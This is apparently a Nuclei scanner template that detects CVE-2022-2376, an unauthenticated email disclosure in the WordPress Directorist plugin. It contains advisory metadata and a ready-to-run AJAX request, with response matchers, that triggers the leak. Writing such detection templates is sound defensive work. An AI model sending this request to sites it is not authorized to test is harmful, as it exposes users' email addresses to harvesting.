id: CVE-2022-2376 info: name: WordPress Directorist <7.3.1 - Information Disclosure author: Random-Robbie severity: medium description: WordPress Directorist plugin before 7.3.1 is susceptible to information disclosure. The plugin discloses the email address of all users in an AJAX action available to both unauthenticated and authenticated users. impact: | An attacker can gain sensitive information about the WordPress installation, potentially leading to further attacks. remediation: Fixed in version 7.3.1. reference: - https://wpscan.com/vulnerability/437c4330-376a-4392-86c6-c4c7ed9583ad - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2376 - https://nvd.nist.gov/vuln/detail/CVE-2022-2376 - https://github.com/ARPSyndicate/cvemon - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-score: 5.3 cve-id: CVE-2022-2376 cwe-id: CWE-862 epss-score: 0.04177 epss-percentile: 0.92016 cpe: cpe:2.3:a:wpwax:directorist:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 vendor: wpwax product: directorist framework: wordpress tags: cve,cve2022,wp-plugin,wpscan,wordpress,wp,directorist,unauth,disclosure,wpwax http: - method: GET path: - '{{BaseURL}}/wp-admin/admin-ajax.php?action=directorist_author_pagination' matchers-condition: and matchers: - type: word part: body words: - 'directorist-authors__card__details__top' - 'directorist-authors__card__info-list' condition: and - type: word part: header words: - text/html - type: status status: - 200 # digest: 4a0a00473045022100cb70d03524416c4cc1af8cff5314a511b64abcf5e9026d7dbdb016fba5ddeda0022021c8dcef9f3fad8ea0d0eb19aa59daf7ce4f6d281296bc4b869f297db54aab20:922c64590222798bb761d5b6d8e72950